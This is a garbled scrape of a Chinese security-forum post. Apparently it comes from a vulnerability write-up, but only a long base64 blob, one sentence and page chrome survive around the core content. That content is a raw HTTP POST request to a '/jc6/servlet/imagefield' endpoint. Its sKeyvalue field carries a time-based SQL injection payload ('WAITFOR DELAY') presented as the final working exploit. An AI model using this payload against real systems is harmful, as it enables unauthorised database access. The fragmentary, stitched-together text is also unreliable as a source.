mOIi3fjiownLsZJv2DDAXGHIiIiIiIiIiIiIiIiIiIiIiIiInL9XHPwoDc5gShjoL2J5s6rfNhc+t9wIxiKiIiIiIiIiIiIiIiIiIiIiIiIyPV0TcGD1plARrIXa/00VdXQOey0xiIiIiIiIiIiIiIiIiIiIiIiIiIyEY04eNASSWpuDvEug7+lnLKG7rHMl4iIiIiIiIiIiIiIiIiIiIiIiIiMkREFD1oiScorJDPWie2sp/R8FV0jmYrYXvqfDSWPIiIiIiIiIiIiIiIiIiIiIiIiIhJGVw0etHhIzZ9OTrwb42+h7Nx5Gnwjma64hcbGLnzdjTS1+MOQVREREREREREREREREREREREREREJB9dwC60zhin5+aTGuAh0N1J2+iy1nUOPItizxPT85/DTcL6Ihkvv9TWS2EMRERERERERERERERERERERERERGRNDBw+6k8grzCEh0kGgvYYLxRdo7B4m6i/gI9CTELcbaB/4gUgi3b0f9ftCyrSIiIiIiIiIiIiIiIiIiIiIiIiIjF7QaYud0RkUzJhKQqSD7pYKik9dJXAQINBBeweAm9iEaAj0H6HQeBOJ84K1XbS3KXhQREREREREREREREREREREREREZLwMCh603nQKCzKIcQZoq7vAmTNltAauPs+wcXRQX9uCBTxp+eRnJuCJcOAwLiJj08jNTyfKGGivpbZlLIoiIiIiIiIiIiIiIiIiIiIiIiIiIiMxeNriCA+RDgAH3sQcZiVNHTJxW1kRp6o6L//dWXOe0ugZTEmIIC6zgLjM/p8PdDdRdq6CTsfVgxFFREREREREREREREREREREREREZGwMDh7sZcy1B/gZuqk9f5z25nTSkuKJ8rqJMJburnbamuqpqayh1R9SfkVEREREREREREREREREREREREQkRIOCB03TeQ4fPD/qFRr8tNeVcb6uLKSMiYiIiIiIiIiIiIiIiIiIiIiIiMjYcIx3BkRERERERERERERERERERERERETk+lLwoIiIiIiIiIiIiIiIiIiIiIiIiMgko+BBERERERERERERERERERERERERkUlGwYMiIiIiIiIiIiIiIiIiIiIiIiIik4yCB0VEREREREREREREREREREREREQmGQUPioiIiIiIiIiIiIiIiIiIiIiIiEwyCh4UERERERERERERERERERERERERmWQUPCgiIiIiIiIiIiIiIiIiIiIiIiIyySh4UERERERERERERERERERERERERGSSUfCgiIiIiIiIiIiIiIiIiIiIiIiIyCSj4EERERERERERERERERERERERERGRSUbBgyIiIiIiIiIiIiIiIiIiIiIiIiKTjIIHRURERERERERERERERERERERERCYZBQ+KiIiIiIiIiIiIiIiIiIiIiIiITDIKHhQRERERERERERERERERERERERGZZBQ8KCIiIiIiIiIiIiIiIiIiIiIiIjLJKHhQREREREREREREREREREREREREZJJR8KCIiIiIiIiIiIiIiIiIiIiIiIjIJKPgQRERERERERERERERERGRMLDWiSc2haTUTGI9ZryzIyIiIiIyLNd4Z0BERERGzlpDTN7NLFu1nIK21/jB746Md5ZERERERCQE1rGc+59eiT20g91bd1PVYcc7SyIiIiIyCtaTx9K7H2L5whmkRvc8gj3726f58bbWcc6ZiIiIiMjQFDwoIiJyg7DeQm5+zxPcMi+DSIehc98b450lEREREREJlYkgNnMe07Pms3DtXRx6+Ye8tP08PqNRakRERERuFNaZxx2f/H+szY4c76yIiIiIiFwTBQ+KTBKOaAd/tNzFoihoaw7wwx3d7OnSg4iRUv3d2BzpGfzbn0zn1lQnLaVl/M2/n+D1phtr/5nkVTzyiQ8zN9mF9bdQun8L+7YXj3e2REREREQkVL4idjz/Gv7la5iRns3Chz9Ddvaz/OiXe2hVAKGIyHVjUtfy6EcfZUaym86Kt3n+u//FiWb1wyIjoeMHIpfcz8opbqxto+Stn/Dy5iNUNbYR0Pc5EREREZngFDwoMgasNaxfFcHjqYbOi918Yn/gGtI6+NQ9Lla6Bl9QWuvnVxu7eaH92i82UzIdLI3pSRcb7+SW9G72lFzzaiatcNefdTj47D0u5gB79nbyjXLdQBhLOUuncGd6BAAJOdk8suA0r28d+XE53mzUfO5/6gnmJjvx1R3g
最终payload如下</p>
<pre><code>POST /jc6/servlet/imagefield HTTP/1.1
Host: xxxx
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/36.0.1985.125 Safari/537.36
Content-Length: 158
Accept: */*
Accept-Encoding: gzip, deflate, br, zstd
Content-Type: application/x-www-form-urlencoded
SL-CE-SUID: 77
key=readimage&amp;sImgname=1&amp;sTablename=FC_ATTACH&amp;sKeyname=1&amp;sKeyvalue=1';WAITFOR
DELAY '0:0:3'--</code></pre>
<p><a id=img14 href=https://xzfile.aliyuncs.com/media/upload/picture/20241011182527-222781ce-87bb-1.png title><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAB9UAAAKGCAYAAAD0/stwAAEAAElEQVR4nOz9V5MkV5qmCT7nHOXGzZx78EiwpEW6trtXZnZWVobI7uz+0L3byx0Z2ZuemZ6pru6qykQiQSIQER7O3Y2bKddzzl6oeRAkgASQSEQgoQ/E4YCbmZqaEtNPP/K+wlpraWhoaGhoaGhoaGhoaGhoaGj4s7HWYoylqiqM0Qgh8H0fIcQ3fr3WmqrSACglcRwH4Bsvo6GhoaGhoaGhoaGhoeH7xXnTK9DQ0NDQ0NDQ0NDQ0NDQ0NDw14QQ9c+fh90sSzTF9IaGhoaGhoaGhoaGhjeMfNMr0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ8LbSFNUbGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhq+gqao3tDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ8BU0RfWGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoavoCmqNzQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0fAXOm16BhoaGhoaGhoa3GWvtm16Fhh8YIcT3u8DNMWSx9X/f/PyUEK/8hxD1NhbfZ3+vBVv/ti+2783fGr4RYvMvASDr/QTwfZ4PdrN/MPW++amdB28jr52b8uX33/f9PdjQ0PCjoYl9G366iOby19DQ0PAjpolhvhnfNuf1Zrdrva5v0/W5Kao3NDQ0NDQ0NHwJN0Gjtbap+/yEeDVQ/16K6y+KiBZrNOgKTAXG8JOq+L4o1EpQDigHIb/H4t3NdjYaa6p6O1vTFG2/DTeNDlKBdOof8Wpy+c/YTzffp0bX54GpwOif3nnwNiIEIOr9rV7Z7y8ea2ho+KnQxL4NP2Ve9pQ1176GhoaGHyP2Re6l4Zvyp655r8WGL/74l12n1xCvZyHelmt0U1RvaGhoaGhoaPgKtDZoY9DaYrTBNPH5XyWCOjhXSqCURCmJlN9XsG7BGmy2xMwvMNPnmNkJpCuocv76C4qb7agUuBGiNURu30eO7qC6u9/ftLq1oAvM7BQ9OcJMjiGZgy7q4m3D13NTTA97yP4BcnQXObgFfgTS/X7ew1SYeIqdn2Oun2HW15AtoSq+n+U3fHuEBOWC30L0D5HDW6jBbUTYqf/e0NDwk8JaMMZQabOJgRvFl4a/bkQtoISUEkdJpPw+7wEaGhoaGn5IrLUYU8cw1jb5uy8iYHOdq3Ne37RAbYx9LTf6QzRf1tfmOj/nvMjPvT3X56ao3tDQ0NDQ0NCw4SYwtLZOJFaVwRjzoitTiCa3+NeGeKXd1hgAgwWUFX9+Ys0abJlh0iV2fIS+eoy+eoyZnf70ionSATdEtAbI9RiVLmA3Q3R2EF6EkN+9uG51hU0XmPkZ+vwTzNVj9PQ5JIt6G1vzPX6Qv1KEAKEg7CL7h8j1BJUnyOEhsj0Cx/vOXeHWGKhyzOoaff0Ec/UYc/n5pqi+Al1+zx+m4RsjRN004bcQg0PU6gqyNXJ0B9keIfzWm17DhoaGvzCvxr6VtujKoI3exL+bx9+eHGZDw/fD5ri/KarfFAiUsi8S+W/LNFxDQ0NDw9dzM019U1CvqgpjLLbJ3n0BgZIGpdTmWqe+VJjsZqtZYzHWUFV1s4Ixr9gY/gUvkTeLtsaiqfOxSkmUrHN0b8P1uSmqNzQ0NDQ0NDS8oE6oVNpQVRqt7WaC+eXkwtsQwDV8f1jzstO22kxlaauxUuI4IDaT1N9qv99IZGmNSZaY6yfo5/+CvvgMsziDPP5pFhLFEpvMMMkMs77GpgvUvX9A9vdB+PVTvvF2fsVDvcjQ0xOqp/+IOfsEszjfNC2UNG0w35J8jU4X9f5J5qjqb0A6iPYIvu3334vzoMSmC6qzP6BPPsRcPcaurqDIwfwEz4O3DgHpApstYT3BxlNUlYF4F+kGr/usNzQ0/BWyiYEqQ7mJfcEgBDhq0/DWfAU0/LVhX/66uQ/QWtdTjdbiuuqtSdw3NDQ0NHwz9CaPV+mmqf7LsVT65ZS550m+NMjbDBXVk+maqqpfICQ48pXr41/oEnkj42+03eRm62EnHAXU0/bwZqXgm6J6Q0NDQ0NDQ8MrmI2kkdbUxfRNR6QQoi6qv+kVbPhesUK86GyWUmwK63VxXWjzYr9/+wWbenp6doK++Bh9+WhTUF+D/onKkVtdS97HMwz1TZoI+wjpIHq7tZ/ztznDrIaqxMxP0RefoE8+xC7rSdu6WNsU1L81uoI8rtU6hAAvRLgh0vUQXhucbykJbjQkc8z1U/TpR5jrp9jlNRRpoyDw1mDr/ZTHGHsFxiDcEOH4CDdCRP3NudnQ0PDXin5F7l0IkOIm7n3Ta9bQ8BfilXDTWlFbH2yKCKXWCClxsCjV3Pk1NDQ0/Fiw1JPVDV+Psba2+Pka7I3ku66fV8uwC4S4GTb6y62fpc7RSQFCipdx6mZdblRm3iTN3XFDQ0NDQ0NDAy+7IbWx2Jukotr4bG+iNiGaovpfG7Xk48v/VwiwArNJrhljEOLLZbG+Cnvjox5PMZPn6KvPsavLzYR69f1/iB8TtpYCJ5ljEJjLR4iwi2j1EVJ985q6tVijoUgw46eYi8+w8wsoko0KQFNQ/27YTWE9wS6vMONnmLCH6IywykN8i6K6BTAasx5jLh5hJ0fY9RjKtG6IaHiL2Oz3IsbGYCZHiLCHaA1RQbspqjc0/JXyMvatGwrBbhKVm5i3CXobfkIIXk6tV5V5rbGkORcaGhoaGv5auIn/vu4xY14+RymBo2oFT/jLx4iCjZKMpM7DIjdS9CA26/WmlWSavtOGhoaGhoaGhg219N+NZ49ASYmSG+n3pqD+V4t4MZFV72+lJFKAMbxIMn8rbD35aZIZZn6KmZ1gG+/ol1gDZY6NZ7XH9uJ8433+Lbez0dgiRU+O0OOjekJdFzQF9T8XC6aCfI2Zn6Onz7HJfCOn/y0xGrOeoK8/x6yua6UG8xNvLHlrsaBLbBGjlxfo+SlmeYX9qTcCNTT8lWOM3cheWyQgBUhJM6Xe8JNB3BzzQiCp7/e01uhGPrihoaGh4a+Wr8+ZaF17qAtqO6DXLTH/8mt3oxh5k59TG0siY+p87ZvO+DRhckNDQ0NDQ0PDK5iNDJIUdSG94adFnVgT3IxMm++aT7MG8jU2mUE8/24Fyb9mrIaqqCeX4/lmgv87NC/om2VMwDbFv+8VXdXe9OtprbLwXYrhm/PArC6haJQafhToqm5QiWeQLBpVgYaGv3IsvFVymg0Nb4pXj3+zUS5raGhoaGj4KXJTthbyzXqXQ31tvimqW958QR0a+feGhoaGhoa/Wm6GPo3RVJUmLwqkkLiug+97b3bl4IWU0E0HJAKUlN/dw/p7Wy9g491Ty7032cWfCvW9gnghfVpLjH/HhVmLrapa6rzKG//oL8NqbJliv/P22XhBl1n90/D9U5VQZXWh9bvsI2trFYIi/W6NEw0/PNZCVdbnZZV/ewWJhoaGHx22DsM3se+bT542NLwJborqQtwk7S0v45bmnGhoaGho+OlgzSY+fGEJ9PXXwRv7lLIsKYqSvChrxRcBruPgOgrHcXBd58XE+zfh5n1vFJTszaV5k7d9U3xtUd1agzUVukjI0oQkK8leHbIREqEcXC8gCALC0MeVopZHbeKNhoaGhoaGN4a1vPDBSdOMOE5ZrmJ836PTjnAcZyPb82Yv2NZailJTlRVWgOvWwZYQdcT0JtbvJjZ7NbHylc+1tXe2riqqoqSyIMMIF43JS/KVxun6OE4dU8WVQimFJy2OzqiswEgX5Ya4CpR4beFYazBGUyQZGomMQlwqqjQjWydklUFj+epSl0QIheP6hO2QMPTxbpJF1mCNocqWFEaiVYjvurhKoL5tU4M1GF1iypxFIZHKJQrqZX1XH/pX169CYVSE5zo4E
</div>
<div class=post-user-action style=margin-top:34px>
<span class="btn btn-default pull-right" id=mark data-action=topic data-pk=15826>
<span id=mark-text>点击收藏 </span><span class=i-seprator> | </span><span id=mark-count>0</span>
</span>
<span class="btn btn-default pull-right" id=follow_topic data-pk=15826>
<span>关注</span><span class=i-seprator> | </span><span id=follow-count>1</span>
</span>
<span class="btn btn-default pull-right">
<span>
<span id=ready_reward data-toggle=modal data-target=#myModal>打赏</span>
</span>
</span>
<div class=clearfix></div>
</div>
<div class=related-section>
<div class=related-box>
<span><a class=pull-left href=https://xz.aliyun.com/t/15825 title=记SuperCS2024Pwn方向一次有意思的getshell><span class=related-label style="padding:3px 4px;margin-right:3px">上一篇:</span>记SuperCS2024Pwn方向...</a></span>
<span><a class=pull-left href=https://xz.aliyun.com/t/15830 title=记一次某CMS审计><span class=related-label>下一篇:</span>记一次某CMS审计</a></span>
</div>
</div>
</div>
</div>
</div>
<div class="modal fade" id=myModal role=dialog aria-labelledby=myModalLabel aria-hidden=true>
<div class=modal-dialog>
<div class=modal-content>
<div class=modal-header>
<h4 class=modal-title id=myModalLabel style=text-align:center>
积分打赏
</h4>
</div>
<div class=modal-body id=button-value>
<div style=text-align:center>
<div role=group>
<button type=button class="btn btn-secondary m64" style=min-width:64px data-value=type1>
1分
</button>
<button type=button class="btn btn-secondary m64" style=min-width:64px data-value=type2>
2分
</button>
<button type=button class="btn btn-secondary m64" style=min-width:64px data-value=type3>
5分
</button>
</div>
<br>
<div style=margin-top:20px>
<button type=button class="btn btn-secondary m64" style=min-width:64px data-value=type4>
8分
</button>
<button type=button class="btn btn-secondary m64" style=min-width:64px data-value=type5>
10分
</button>
<button type=button class="btn btn-secondary m64" style=min-width:64px data-value=type6>
20分
</button>
</div>
</div>
</div>
<div class=modal-footer id=confirm>
<button type=button class="btn btn-default" data-dismiss=modal>关闭</button>
<button type=button class="btn btn-primary" id=reward_topic data-pk=15826>确定</button>
</div>
</div>
</div>
</div>
<div class="row box">
<ol class=breadcrumb>
<li class=active>0 条回复</li>
</ol>
<div class="box-container post-container">
<ul>
<li style=min-height:50px;line-height:60px;margin-left:15px><strong>动动手指,沙发就是你的了!</strong></li>
</ul>
</div>
</div>
<div class="row box" id=reply-box>
<div class="box-container clearfix">
<div class=reminder>
<a href="https://account.aliyun.com/login/login.htm?oauth_callback=https%3A%2F%2Fxz.aliyun.com%2Ft%2F15826&amp;from_type=xianzhi"><strong>登录</strong></a> 后跟帖
</div>
</div>
</div>
</div>
</div>
</div>
<footer class=bs-docs-footer>
<div class="container text-center">
<div class=links>
<a href=https://xz.aliyun.com/feed target=_blank>RSS</a>
<a href=https://xz.aliyun.com/about target=_blank><span>关于社区</span></a>
<a href=https://xz.aliyun.com/partner target=_blank><span>友情链接</span></a>
<a href=https://xz.aliyun.com/notice>社区小黑板</a>
<a href=https://xz.aliyun.com/connection>联系我们</a>
<a href=https://report.aliyun.com/ target=_blank>举报中心</a>
<a href=https://www.aliyun.com/complaint target=_blank>我要投诉</a>
</div>
</div>
</footer>
<div id=waf_nc_block style=display:none></div><div id=gtx-trans style=position:absolute;left:432px;top:4812.03px><div class=gtx-trans-icon></div></div><div id=immersive-translate-popup style=all:initial><template shadowrootmode=open><style class=sf-hidden>/*!
* Pico.css v1.5.6 (https://picocss.com)
* Copyright 2019-2022 - Licensed under MIT
*/#mount{--font-family:system-ui,-apple-system,"Segoe UI","Roboto","Ubuntu","Cantarell","Noto Sans",sans-serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol","Noto Color Emoji";--line-height:1.5;--font-weight:400;--font-size:16px;--border-radius:0.25rem;--border-width:1px;--outline-width:3px;--spacing:1rem;--typography-spacing-vertical:1.5rem;--block-spacing-vertical:calc(var(--spacing)*2);--block-spacing-horizontal:var(--spacing);--grid-spacing-vertical:0;--grid-spacing-horizontal:var(--spacing);--form-element-spacing-vertical:0.75rem;--form-element-spacing-horizontal:1rem;--nav-element-spacing-vertical:1rem;--nav-element-spacing-horizontal:0.5rem;--nav-link-spacing-vertical:0.5rem;--nav-link-spacing-horizontal:0.5rem;--form-label-font-weight:var(--font-weight);--transition:0.2s ease-in-out;--modal-overlay-backdrop-filter:blur(0.25rem)}@media (min-width:576px){#mount{--font-size:17px}}@media (min-width:768px){#mount{--font-size:18px}}@media (min-width:992px){#mount{--font-size:19px}}@media (min-width:1200px){#mount{--font-size:20px}}@media (min-width:576px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*2.5)}}@media (min-width:768px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*3)}}@media (min-width:992px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*3.5)}}@media (min-width:1200px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*4)}}@media (min-width:576px){article{--block-spacing-horizontal:calc(var(--spacing)*1.25)}}@media (min-width:768px){article{--block-spacing-horizontal:calc(var(--spacing)*1.5)}}@media (min-width:992px){article{--block-spacing-horizontal:calc(var(--spacing)*1.75)}}@media (min-width:1200px){article{--block-spacing-horizontal:calc(var(--spacing)*2)}}dialog>article{--block-spacing-vertical:calc(var(--spacing)*2);--block-spacing-horizontal:var(--spacing)}@media (min-width:576px){dialog>article{--block-spacing-vertical:calc(var(--spacing)*2.5);--block-spacing-horizontal:calc(var(--spacing)*1.25)}}@media (min-width:768px){dialog>article{--block-spacing-vertical:calc(var(--spacing)*3);--block-spacing-horizontal:calc(var(--spacing)*1.5)}}a{--text-decoration:none}a.secondary,a.contrast{--text-decoration:underline}small{--font-size:0.875em}h1,h2,h3,h4,h5,h6{--font-weight:700}h1{--font-size:2rem;--typography-spacing-vertical:3rem}h2{--font-size:1.75rem;--typography-spacing-vertical:2.625rem}h3{--font-size:1.5rem;--typography-spacing-vertical:2.25rem}h4{--font-size:1.25rem;--typography-spacing-vertical:1.874rem}h5{--font-size:1.125rem;--typography-spacing-vertical:1.6875rem}[type="checkbox"],[type="radio"]{--border-width:2px}[type="checkbox"][role="switch"]{--border-width:3px}thead th,thead td,tfoot th,tfoot td{--border-width:3px}:not(thead,tfoot)>*>td{--font-size:0.875em}pre,code,kbd,samp{--font-family:"Menlo","Consolas","Roboto Mono","Ubuntu Monospace","Noto Mono","Oxygen Mono","Liberation Mono",monospace,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol","Noto Color Emoji"}kbd{--font-weight:bolder}[data-theme="light"],#mount:not([data-theme="dark"]){--background-color:#fff;--background-light-green:#F5F7F9;--color:hsl(205deg,20%,32%);--h1-color:hsl(205deg,30%,15%);--h2-color:#24333e;--h3-color:hsl(205deg,25%,23%);--h4-color:#374956;--h5-color:hsl(205deg,20%,32%);--h6-color:#4d606d;--muted-color:hsl(205deg,10%,50%);--muted-border-color:hsl(205deg,20%,94%);--primary:hsl(195deg,85%,41%);--primary-hover:hsl(195deg,90%,32%);--primary-focus:rgba(16,149,193,0.125);--primary-inverse:#fff;--secondary:hsl(205deg,15%,41%);--secondary-hover:hsl(205deg,20%,32%);--secondary-focus:rgba(89,107,120,0.125);--secondary-inverse:#fff;--contrast:hsl(205deg,30%,15%);--contrast-hover:#000;--contrast-focus:rgba(89,107,120,0.125);--contrast-inverse:#fff;--mark-background-color:#fff2ca;--mark-color:#543a26;--ins-color:#388e3c;--del-color:#c62828;--blockquote-border-color:var(--muted-border-color);--blockquote-footer-color:var(--muted-c
Reference in New Issue Copy Permalink